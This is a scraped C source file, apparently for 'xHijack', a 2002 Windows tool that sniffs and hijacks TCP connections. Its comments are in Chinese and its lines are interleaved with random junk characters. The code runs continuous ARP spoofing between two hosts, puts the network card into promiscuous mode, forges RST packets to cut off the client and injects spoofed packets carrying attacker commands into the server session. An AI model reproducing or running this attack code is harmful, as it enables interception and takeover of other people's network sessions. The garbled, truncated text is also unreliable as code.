u, ?$ q$ r8 H8 ?3 Z9 I scanf("%1d", &iAdapter); } . ^; \9 {# i" q$ e6 a+ f printf("\n"); ( [/ w2 N3 @8 i" F- R //---------------------------------------------// . y1 K) n$ v6 e: E3 g //这里调用iphlpapi来取得本地ip_addr和mac_addr / b0 N) c g1 L- Z, g9 ] sprintf(szSelectAdapterName, "%S", AdapterList[iAdapter -1], sizeof(szSelectAdapterName)-1); dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_BUFFER_OVERFLOW) { printf("GetAdapterInfo error:%d\n", GetLastError()); return 0; 0 U/ Y( H5 L4 U1 [ } pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen); if(!pAdapterInfo) { ; S y/ X* P; c printf("malloc memory for pAdapterInfo error:%d\n", GetLastError()); return 0; 6 m; T0 p# c: A. e1 x } dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_SUCCESS) 0 ^* `8 P! [7 X/ P# G( J { printf("GetAdapterInfo error:%d\n", GetLastError()); 8 T& B4 x8 x- X return 0; 8 X1 n8 w) ]% ^/ Q* x } $ j' B6 V, T9 i pTmp = pAdapterInfo; 6 L% L9 B, }9 \7 n4 w& { while(pTmp) $ }. B, X0 y* Z8 ?: a { //字符匹配

韩冰

if(strstr(szSelectAdapterName, pTmp->AdapterName)) { //found it,get own adapter mac address memcpy(g_szOwnMAC, pTmp->Address, 6); ) k1 K& ^9 M" O& {/ p# } //get ip address pIPAddr = &pTmp->IpAddressList; % f2 D( a5 _( O. |$ R; H1 } while(pIPAddr) ( o+ Z; I% n/ O4 K2 ^; m( q7 Q: H { g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress); pIPAddr = pIPAddr->Next; if(g_TotalIP >= Max_Num_IPAddr) break; } # t4 Q* M5 R* a X break; , d5 W$ i# `3 n1 c/ n } ) K% Z0 M0 L* Q) h2 z2 m pTmp = pTmp->Next; ; U0 _: S2 ^! m3 x+ m0 e } free(pAdapterInfo); 4 u' H& k/ ~/ N: w: M3 ~$ K9 p //not found,return zero if( (!pTmp) || (!g_TotalIP) ) return 0; 2 K! E. b; g1 X) d; E //---------------------------------------------// //open adapter lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]); if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) & F% ~1 a0 I! Z4 | }3 t { iRetCode = GetLastError(); printf("Unable to open the driver, Error Code : %lx\n", iRetCode); + A7 m9 L6 @) o' a) l( R% m return 0; } // set the network adapter in promiscuous mod 9 }) Q; F8 r5 N# t" r6 Q9 \6 Q if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) 3 T1 y+ F2 q& `8 a: p; o! | { printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n"); if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE) { printf("Unable to set ALL_LOCAL mode!\n"); return 0; } T v% \9 K7 T$ A2 K } 9 O! U/ v3 [5 j9 l/ P! u // set a 512K buffer in the driver - S1 o j r. x+ ^* G1 U, K if(PacketSetBuff(lpAdapter, 512000) == FALSE) { printf("Unable to set the kernel buffer!\n"); return 0; } 2 ]/ z# E- q8 U // set a 1 second read timeout 0 A, H9 E' K+ k! Y) P/ g if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE) * n$ H: s: c' }& ^/ X printf("Warning: unable to set the read tiemout!\n"); if(PacketSetNumWrites(lpAdapter, 1) == FALSE) printf("warning: Unable to send more than one packet in a single write!\n"); //设置发送的packet g_lpSendPacket = PacketAllocatePacket(); if(g_lpSendPacket == NULL) { printf("Error:failed to allocate the LPPACKET structure for send packet.\n"); r. C" ?' f; A) H+ y return 0; } ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf)); PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514); return lpAdapter; } 2 l( N4 @' \9 t# S: J# q 5 A8 Z! t8 n2 q5 e) u1 [. Y* \//功能：帮助信息 void usage() + h9 T. G) h' S6 v{ 7 f. w) |. j7 j printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n" "By eyas 2002/8/19\n" "http://www.ey4s.org\n" "Thanks to Refd0m and shotgun\n\n" "Usage: xHijack ServerSide ClientSide\n\n"); ) U: m' Z5 Q. d5 m8 g} // //功能：显示数据包的一些详细信息 ) ^% b- K6 I, c' U! z" f8 g// + w" b/ ?" G0 t, M! ^ @9 W: [VOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail) { SOCKADDR_IN saDest, saSrc; unsigned char FlagMask; int i; # B) Z9 F. J) f saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP; * y' d$ D$ O; f& V6 ^/ V saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP; printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport)); printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr), 1 v7 S# r! T/ F: D3 y ntohs(pTCPPacket->tcphdr.th_dport), usDataLen); $ j( r w' ]2 r' ~$ j; }" X2 `5 x //display TCP flag for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1) - G q( F2 A* T4 U6 Q5 E+ X { ! y9 w1 A) t3 A# ] if((pTCPPacket->tcphdr.th_flag) & FlagMask) $ J. {# z$ ^0 V8 }# L printf("%c", g_szTcpFlag); ' N) P9 B0 x/ T3 c8 O else printf("-"); 0 |0 O7 i1 P3 P } ; |+ G- |6 P0 }0 N5 n' s/ f1 o( B printf("\n"); //如有需要，可显示更多详细的信息 - ^6 w. [& {4 Y' v0 {9 |! k! u3 F if(bDetail) , M+ \7 }4 t4 w3 m6 t printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack)); # g) c& b8 ]( F} 3 A. b. F! j9 e; a4 }8 |9 y// 5 `/ N8 Q3 f' v/ x//功能：处理收到的数据包(只分析本不属于自己的包)，然后根据用户输入，完成各种功能 3 u, J( u- I4 F- S// DWORD WINAPI AnalysePacketsThread(LPVOID lp) * Y. v2 Z6 I/ z7 G{ ULONG ulBytesReceived; USHORT usDataLen; B" O, I( J) { //USHORT usIPHeadLen, usTCPHeadLen; : J ]2 m6 V! B! T- `, u* o char *buf; ( B# g/ N, L: d+ q# }" {( f7 V4 f u_int off, i; PTCPPACKET pTCPPacket; 4 Z4 @8 _" Y' F" P U$ o struct bpf_hdr *hdr; 4 J8 X0 c4 ?: @9 \ LPPACKET lpRecvPacket; # B! J9 `! k6 e/ f char szPacketBuf[256000], *pStr; * L0 u$ e7 @% f8 W' D BOOL bDeleteNode, bAddNew; 0 H" X5 X: K# E0 G! O DWORD ident;//当前所处理的数据包，所属的连接的唯一标识 - e! `6 N; R* K; j: i) ~" F, K BOOL bClientToServer;//数据包是否从客户端发送到服务器端 - _$ S8 g/ x$ g$ m9 K$ _1 a5 x3 |/ V ; \' P/ o$ t3 r //设置接收的packet lpRecvPacket = PacketAllocatePacket(); if(lpRecvPacket == NULL) { " p6 E% m; u$ U# N0 B: i2 y printf("Error:failed to allocate the LPPACKET structure for recv.\n"); $ p% w' N0 o1 [1 D9 Y* d9 A return 0; $ l7 a8 F+ m+ H9 r& H: \ } ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); 6 L0 L8 d; P% B" r5 ]' H% W6 u PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); : P3 I/ ]" i/ {( F- g# m+ e. o% D$ d while(1) $ s: ?! Y% P8 }* S* A { // capture the packets if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) ) U: z& ^* r1 \" g% `( \5 D, q6 u { , i6 s& M9 z1 z+ [, O8 M printf("Error: PacketReceivePacket failed.\n"); $ ]; T; i! @( I" H4 P0 s break; } 6 o9 A! O2 ?/ s3 E6 G9 F ulBytesReceived = lpRecvPacket->ulBytesReceived; buf = lpRecvPacket->Buffer; off = 0; + r7 ~# z1 O5 \, `, D while(off < ulBytesReceived) { ) G' r& {, E: J% W+ b& W hdr = (struct bpf_hdr *)(buf + off); off += hdr->bh_hdrlen; pTCPPacket = (PTCPPACKET)(buf + off); off = Packet_WORDALIGN(off + hdr->bh_caplen); ; }# ]& K7 `4 _% m4 I" I9 p //不需要处理自己发出的包(转发或本机发送的) if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; //检查是否IP包 if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; //检查是否TCP包 if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; 8 ~. B7 P* L( [, I //也不处理DestIP是自己的包 for(i=0; i

韩冰

pTCPPacket-&gt;iphdr.sourceIP, pTCPPacket-&gt;tcphdr.th_sport, TRUE, FALSE);
            //reset action flag
, E) g& c) D2 U$ H. p9 x* @8 k/ N            ResetActionAllFlag();
          }
          //start hijack
# @0 E0 p) E/ U! i          else if(g_dwAction == ACTION_HIJACK)
          {
            //send rst packet to client
: `9 D, {9 A+ |' o4 c            SendRstPacket(pTCPPacket-&gt;tcphdr.th_ack, pTCPPacket-&gt;tcphdr.th_seq);
0 J5 D( r, {' E6 }2 N. F            //send hijack packet to client
            SendHiJackPacket(pTCPPacket);
            //reset action flag
+ h* @# i/ i  X, H            ResetActionAllFlag();
2 @1 V, ^% o- Z          }
        }
        //show the tcp data
2 n2 V8 \5 p! C& r) }        if( (g_dwAction == ACTION_WATCH) &amp;&amp; (usDataLen) )
        {
          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE);
          //暂不考虑IP、TCP头不是20字节的情况
6 B& ~6 q! _) F3 d) Q# J          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
8 j  b, Q' z! T4 P9 I          pStr = (char *)pTCPPacket + 54;
0 e" l- k0 I3 I          for(i=0; i        }
      }
* G; |# X; ~. [) q$ k      //debug output
2 ^8 j  s+ s% i: F      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE);
    }//end of analyse packets while
  }//end of recv packets while
  PacketFreePacket(lpRecvPacket);
+ T1 m4 J: V$ Q4 |! o4 k( E1 s  return 0;
}

& G) M( ~7 `8 Q# a
//
& H2 z( K- h# M* P. m/ |//功能：操作记录所有连接信息的单向链表
//
4 O9 R5 k; Q. f& P6 g8 _2 UDWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP,
            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
{
  PCONNINFO  pNew, pTmp;
! h( v5 G/ z+ k8 r
  pTmp = g_pConnHead;
+ @" \- T+ j+ h, v- P/ ~6 j  while(pTmp)
0 N  _/ H; w9 i0 S2 V& s  {
    if(pTmp-&gt;bActive)
    {
6 \! V# k  C6 t% S- k      //found it
) N6 N) [8 c& ^9 c% k      if( (pTmp-&gt;dwServerIP == dwServerIP) &amp;&amp;
        (pTmp-&gt;uServerPort == uServerPort) &amp;&amp;
        (pTmp-&gt;dwClientIP == dwClientIP) &amp;&amp;
        (pTmp-&gt;uClientPort == uClientPort) )
0 h, z; o$ A( C( S      {
        if(bDelete)
& T# {+ }$ U5 H+ O* r        {
6 D5 p: f; s! n! }- i& S' K- r          pTmp-&gt;bActive = FALSE;
          return 0;
        }
: [% W! d1 L2 A4 H$ T; A1 d        else return pTmp-&gt;ident;
( C% W3 Y! E' c8 n- E, I      }
7 P/ p) Z5 E9 E    }
; |7 u2 K5 D3 _( G* i    pTmp = pTmp-&gt;Next;
+ j4 v" K  x7 [' ^  s' r, }' w6 g  }
! E0 B3 Q: L5 N  //not found, create new node
  if( (!pTmp) &amp;&amp; (!bDelete) &amp;&amp; (bAddNew) )
6 \. U8 g( Q2 u2 y4 X" Y& v  {
    //search unactive note
    pTmp = g_pConnHead;
/ M7 B6 e, u- k    while(pTmp)
8 I' t/ D" s2 f8 j* N    {
      if(!pTmp-&gt;bActive) break;
% ^" ]7 X' \" B4 j1 K. F: c      pTmp = pTmp-&gt;Next;
    }
    //found a unactive node
    if(pTmp)
' N4 G( A& v$ q- i    {
      pTmp-&gt;dwServerIP = dwServerIP;
7 p) p+ J: Y) S& a1 E- j9 Q0 U      pTmp-&gt;uServerPort = uServerPort;
      pTmp-&gt;dwClientIP = dwClientIP;
1 v' f/ A/ v+ ]5 d      pTmp-&gt;uClientPort = uClientPort;
      pTmp-&gt;bActive = TRUE;
# Q, R5 G# K9 E      return pTmp-&gt;ident;
' t) h4 Y/ Q5 `% F4 J2 R    }
9 E) Y0 H& @: j4 `, i; s" S    //not found,create new node
    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
    if(!pNew)
! r  d4 s4 B* v    {
      printf("malloc for link node error:%d\n", GetLastError());
7 k9 W& J& n; t  j' i! v. D9 R6 I0 W      return 0;
    }
4 Y! g, K$ {" n5 Z2 T9 A1 y    //fill the struct
    pNew-&gt;bActive = TRUE;
    pNew-&gt;dwServerIP = dwServerIP;
1 j. o5 o" U# J7 H, X5 N    pNew-&gt;uServerPort = uServerPort;
/ B% K+ @$ i; _+ d2 ]    pNew-&gt;dwClientIP = dwClientIP;
) j7 P$ c& I! w' ?    pNew-&gt;uClientPort = uClientPort;
    pNew-&gt;ident = ++g_ident;
    pNew-&gt;Next = NULL;
    //add new node to link
" Y9 U4 m% |, s# c* S8 n: D$ g    if(!g_pConnHead)
1 g& x& |! B, h; t      g_pConnHead = g_pConnLast = pNew;
' s: {& C3 b+ a, c$ X& ~2 D4 E    else
    {
. a; M% {% z: ]      g_pConnLast-&gt;Next = pNew;
      g_pConnLast = pNew;
: k# [2 A0 i$ l4 W    }
    return pNew-&gt;ident;
4 B, i2 ^1 a4 K- }8 l  }
  return 0;
}
* X  e4 g/ \6 k4 o0 _- Y
& O" m5 ~" T1 k$ F; q) }* z//
* X0 ?1 x( ], N' \0 q//功能：判断一个数据包是不是只有ACK标志
//
# J5 N7 B4 h7 D# R% T, J  v, LBOOL IsACKPacket(unsigned char flag)
0 p! E5 w' S1 A, b- M{
# G+ }3 C. ~# J6 f' O. K4 ~  int  i, j=1;
/ ?- l4 e) _- Q% k! V" R0 v# ]" i  for(i=0 ; i&lt;4; i++)
  {
    if(flag &amp; j) return FALSE;
9 e6 P/ {9 |) K0 a% o: U7 l$ u    j &lt;&lt;= 1;
* a! r( I- s* B& M  }
  if(!(flag &amp; 0x10)) return FALSE;//is ack?
* z" y% M. {$ r! k9 `: B( _+ v  if(flag &amp; 0x20) return FALSE;
) j  H( E2 Z! a  return TRUE;
}

//
//功能：伪装成Client给Server发送数据包
//
5 E. E* X7 L4 ~- \) ~! e1 `BOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
# D3 e8 ]! E. o7 @2 W' {{

7 B4 B& \1 A7 S& d+ |/ N% n1 s/ }  char    szBuff[1520];
  PSDHDR    psdhdr;
  PTCPPACKET  pHiJackPacket = NULL;
  BOOL    bRet = FALSE;
3 A& w: n4 n. T8 P$ @
" `6 T& H% x7 h4 u+ o& M9 d& j  __try
& o1 {$ a- p( x6 f  {
7 F' W; S* K2 g1 h+ i! ~    //
    if(!g_pCurrCtrlConn) __leave;
& F* r! D) m7 R+ E    //allocate memory for hijack packet
; [! U( |+ @% ^% g    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
7 o8 k/ _$ }; j0 T6 C0 Z3 [+ w+ F4 B    if(!pHiJackPacket)
    {
& D/ U- j- q1 L! p+ T* j" G: k      printf("malloc error:%d\n", GetLastError());
- P3 ]4 ?! Y- R: q& S      __leave;
$ ]0 g) n" T+ p4 d' {$ v    }
/ o; O6 k: Q5 w( k: v    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
0 d, \. L5 v% C) G) S- D6 n" s    //-------------- modify the packet ---------------//
; g3 ?" p/ p/ f5 u4 I  K( E6 ?    //modify ethernet head
    memcpy(pHiJackPacket-&gt;ehhdr.DestMAC, g_szServerSideMAC, 6);
5 o- W4 M- \8 ]; E* [* |" H' P    memcpy(pHiJackPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
0 I# _+ H/ |% f7 {    //modify ip head
    pHiJackPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
    pHiJackPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)+strlen(g_szCommand));
    pHiJackPacket-&gt;iphdr.ident += 1;//标识加1
+ v4 R* ^% a' F    pHiJackPacket-&gt;iphdr.checksum = 0;
7 Y$ h$ M* ^  I1 S& Q2 H    pHiJackPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwClientIP;//源IP地址，伪装成client
    pHiJackPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwServerIP;//目的IP地址，接收hijack包的地址
8 z' y  S! o4 X5 ~' o4 L& K' v    //modify tcp head
    pHiJackPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uClientPort;//client's port
( b4 r% T: B) _. Q' `# i& Q0 O( c    pHiJackPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uServerPort;//server's port
    pHiJackPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4 &lt;&lt; 4 | 0);
    pHiJackPacket-&gt;tcphdr.th_flag = 0x18;// PA
/ ]/ |5 r. u1 j. f5 r    pHiJackPacket-&gt;tcphdr.th_sum = 0;
    pHiJackPacket-&gt;tcphdr.th_win = 0x3F44;
    //fill tcp psd head
/ t- b6 a" \8 i# _. [0 p" x    psdhdr.saddr = pHiJackPacket-&gt;iphdr.sourceIP;           
4 l. T+ O4 K- N1 ]- O, s* z! i    psdhdr.daddr = pHiJackPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons(sizeof(TCPHDR) + strlen(g_szCommand));//tcp head + data len
    //calculate tcp checksum     
    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
    memcpy(szBuff + sizeof(PSDHDR), &amp;pHiJackPacket-&gt;tcphdr, sizeof(TCPHDR));
    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, strlen(g_szCommand));
" Z3 [$ R+ N* ?2 U  b' I. f0 d    pHiJackPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR) + strlen(g_szCommand));
' [; E1 N" r$ p( c( H5 S( P    //calculate IP checksum
    pHiJackPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pHiJackPacket-&gt;iphdr, sizeof(IPHDR));
    //fill send buffer           
    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET));
    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, strlen(g_szCommand));
5 B( U8 S. A' |5 D+ T    memset(szBuff + sizeof(TCPPACKET) + strlen(g_szCommand), 0, 4);
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
- |+ z) F& S6 m% p. ^    memcpy(g_lpSendPacket-&gt;Buffer, szBuff, sizeof(TCPPACKET) + strlen(g_szCommand));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
7 _0 d+ _' I/ Y& l- j3 s8 R    {
2 J* R8 O- M. n8 U6 E) e0 `      printf("Error sending the hijack packets!\n");
      __leave;
/ U! G+ D6 F3 Y3 V7 V; l3 b    }
3 e8 @+ `/ e. t: I: N5 x& q    else printf("Send hijack packet ok!\n");
    bRet = TRUE;
  }

韩冰

__finally
1 o$ I/ x, g: X  {
    if(pHiJackPacket) free(pHiJackPacket);
  }
4 _1 z" Y  }2 R2 r  return bRet;
}


//
* d( }" W) o# n//功能：伪装成Server给Client发送rst包
% {7 }4 v3 d- S0 G. S) O//
BOOL SendRstPacket(unsigned int seq, unsigned int ack)
) t) G( ?7 p" I! \& a$ C{
7 X7 {0 ?- B( ?2 ]' l' Q  char    szBuff[60];
! h! h# x$ O' u" b) o! S5 X: ^: r  PSDHDR    psdhdr;
  PTCPPACKET  pTcpPacket = NULL;
* G6 S; p# U2 `7 ?. m8 k' S  BOOL    bRet = FALSE;
! Q% y, B4 \2 ~0 W
  __try
, A3 M$ O* Q1 g3 t  {
* |/ h* A8 H7 g- z    //检查当前指向想控制的连接的信息的指针是否为空
8 [# I% m9 X, p7 ]  l. |; k' Y    if(!g_pCurrCtrlConn) __leave;
    //allocate memory for rst packet
    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pTcpPacket)
7 [- A. l9 o2 Q7 x0 y    {
+ m, K, w& |) H+ S% i+ x      printf("malloc error:%d\n", GetLastError());
      __leave;
    }
# m+ f8 Q$ y* b0 s    //fill ethernet head
. @1 t# o9 a" Z. n9 `- G( g    memcpy(pTcpPacket-&gt;ehhdr.DestMAC, g_szClientSideMAC, 6);
    memcpy(pTcpPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    pTcpPacket-&gt;ehhdr.EthernetType = htons(EPT_IP);
    //fil ip head
( }7 y+ V0 J9 e0 \    pTcpPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
; d! F9 K% i: h, Z  M    pTcpPacket-&gt;iphdr.tos = 0;
2 ~+ m' X" Q/ L& D3 j    pTcpPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR));
, n/ L3 J" N1 Z3 i    pTcpPacket-&gt;iphdr.ident = 1;
  \6 d, X. B% v2 v5 b    pTcpPacket-&gt;iphdr.frag_and_flags = 0;
    pTcpPacket-&gt;iphdr.ttl = 128;
+ G* ^1 y: W1 l1 s7 _3 {    pTcpPacket-&gt;iphdr.proto = IPPROTO_TCP;
    pTcpPacket-&gt;iphdr.checksum = 0;
8 _' f5 l* {: [& h$ a: E    pTcpPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwServerIP;//源IP地址，伪装成服务器的
/ h/ g/ R$ L+ Q    pTcpPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwClientIP;//接收此rst包的ip地址
: |7 \7 n6 u: J: }  f7 v$ P% q' |    //fill tcp head
9 ~3 _; u: v' H: h/ T    pTcpPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uServerPort;//源端口号，伪装成服务器的端口
5 v4 H! T7 A& ~; s    pTcpPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uClientPort;//接收此rst包的端口
    pTcpPacket-&gt;tcphdr.th_seq = seq;//SYN
    pTcpPacket-&gt;tcphdr.th_ack = ack;//ACK
0 V# Y$ {3 r4 \0 B    pTcpPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4&lt;&lt;4|0);
    pTcpPacket-&gt;tcphdr.th_flag = 4;//RST flag
    pTcpPacket-&gt;tcphdr.th_win = 0;
7 ?" ?; |' U" u$ r! _  b/ m. r    pTcpPacket-&gt;tcphdr.th_urp = 0;
    pTcpPacket-&gt;tcphdr.th_sum = 0;
    //fill tcp psd head
+ H+ \, m# w/ V1 C( L! T    psdhdr.saddr = pTcpPacket-&gt;iphdr.sourceIP;           
    psdhdr.daddr = pTcpPacket-&gt;iphdr.destIP;           
" t8 H$ W! R4 R9 P. ~+ U3 @' z    psdhdr.mbz = 0;
% z0 I3 g9 W$ Q: G    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons(sizeof(TCPHDR));
    //calculate tcp checksum     
6 r9 k; k% g: q& w2 A* }' }: ^    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
    memcpy(szBuff + sizeof(PSDHDR), &amp;pTcpPacket-&gt;tcphdr, sizeof(TCPHDR));
0 L  v+ H. Z5 J- c6 [# U    pTcpPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR));
1 f; {6 H" Y7 x9 G) F( K" E    //calculate IP checksum
: j# ^9 \0 g7 E1 }& c4 [    pTcpPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pTcpPacket-&gt;iphdr, sizeof(IPHDR));
( s( f/ Q5 o# @3 d4 L: Q/ N    //fill send buffer
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
) f% V7 c- T  n" c6 s+ F: G: \6 }    memcpy(g_lpSendPacket-&gt;Buffer, (char *)pTcpPacket, sizeof(TCPPACKET));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
0 k: v5 w3 T, @9 I, K* R7 i8 z; o    {
      printf("Error sending the rst packets!\n");
      __leave;
! D0 b2 Y1 u( U# e8 T# c    }
+ T$ i7 d/ L) ]2 u7 N: Z- l# D% I3 T    else printf("Send RST packet ok!\n");
    bRet = TRUE;
$ K4 Y$ P4 T3 `" x" L" n# k  }
2 }7 V; v# g* E$ I8 _* \1 u: O  __finally
  {
    if(pTcpPacket) free(pTcpPacket);
  }
, v% S5 F  }- f- b0 w) N' \  return bRet;
}
1 ~& w' t! l- }. W- y
. I- j4 p. P& g- Z//
7 c& X4 [, Y! b$ G7 K- Y//功能：计算校验和
//
/ B) J. b) b7 s! G! _' l+ `USHORT checksum(USHORT *buffer, int size)
{
- i6 X7 a" O- G  z9 V! Y5 P unsigned long cksum=0;
, R8 e$ @' x& T  i$ L! y% g8 Y while(size &gt;1) {
, X- o$ U/ m2 q: r- S  cksum+=*buffer++;
  size -=sizeof(USHORT);
2 V1 B' D7 P9 w  g }
2 t2 J5 i: R2 A* s% r if(size ) {
1 i2 }8 l% M+ p" f# T* A+ X  cksum += *(UCHAR*)buffer;
}
cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);
) ~! }4 e0 i. F cksum += (cksum &gt;&gt;16);
return (USHORT)(~cksum);
7 p! I" i; H2 `6 L}
) Y8 t) {  w/ l% k$ L! W* g
; f+ g7 l) q0 p/ n. V//
//功能:实施ARP欺骗
; g' `, O- S% p//1 告诉ServerSide,ClientSide的mac是ownmac
. c8 _9 i, _* i0 I# z, N//2 告诉ClientSide,ServerSide的mac是ownmac
+ Y, f3 v3 T  r; ?, h! M( l//
) v- ?# c, k7 \+ s$ `  J6 aDWORD WINAPI ArpSpoofThread(LPVOID lpType)
{
  int  iType = *(int *)lpType;
6 O' z5 i2 U* ~# U. z  ARPPACKET  ArpPacket;
  LPPACKET  lpArpPacket;
1 M: M, o7 z& R9 K  char    szArpBuff[60];
* F0 f* M: _. b
4 D% @1 O2 h' O7 d  switch(iType)
2 n% U: }# ~+ R. R" o" d% X  {
$ Z, _8 q7 i5 U+ K: K% i; {    case 1:
7 j7 ?; s  y6 v      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
9 _) {4 m, K8 x* D- E      ArpPacket.arphdr.DestIP = g_ServerSideIP;
: d& A( K5 U" o9 }      ArpPacket.arphdr.SourceIP = g_ClientSideIP;
      break;
% J: c& @5 Y) W2 S2 Z$ _    case 2:
* G2 c' F2 e4 `: l$ B$ w      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6);
$ f8 r5 L- W; [6 q6 m      ArpPacket.arphdr.DestIP = g_ClientSideIP;
      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
" ]! y/ P' o& Y      break;
8 _( G; h) c% [9 [# R: E" r    default:
      return 0;
6 L' Z+ x- u9 X8 r; X2 K+ w% }  }
  //ethernet head
  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6);
+ Q4 L  ?0 _& ~2 [8 M, s9 J  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
  //arp head
  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//dest's mac
! D" V  A, s. h3 P$ D# D% E  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
0 g/ W) x! `# i1 i( F  ArpPacket.arphdr.HrdAddrlen = 6;
  ArpPacket.arphdr.ProAddrLen = 4;
$ C# b) S- ?, z' D2 h  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE);
  ArpPacket.arphdr.ProType = htons(EPT_IP);
7 {$ Z* M& u0 |1 L2 @  ArpPacket.arphdr.op = htons(2);//arp reply
- P4 z) e& M# E
& x7 j) B% r; y  I8 p9 B  lpArpPacket = PacketAllocatePacket();
  if(lpArpPacket == NULL)
  {
    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
$ P: B; L2 p2 b3 Y$ W    return 0;
  }
3 I5 Y) |4 r% L- g8 }$ k) d3 J( I1 |  memset(szArpBuff, 0, sizeof(szArpBuff));
  memcpy(szArpBuff, (char *)&amp;ArpPacket, sizeof(ARPPACKET));
" [+ c  s' L, @  PacketInitPacket(lpArpPacket, szArpBuff, 60);
  //send arp packet
  while(1)
  {
    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
/ z) o* v* k; ]3 Q5 f! E1 ~4 D    {
      printf("Error sending the arp spoof packets!\n");
      return 0;
' x2 T' l1 i6 a  M8 c& q; L    }
5 I# r& W, w; k. E    Sleep(1000);
  }
  return 0;
' W8 F) k4 P5 E* Z) Y( P}
2 O- {- w$ _' V% W4 F3 c' n1 G7 b4 Y3 f" @
//
2 U! F4 W& x  k0 P  N$ n; Q//功能：输入IP取得对应的MAC地址
//
% @- P( q3 f' `BOOL GetMACAddr(DWORD DestIP, char *pMAC)
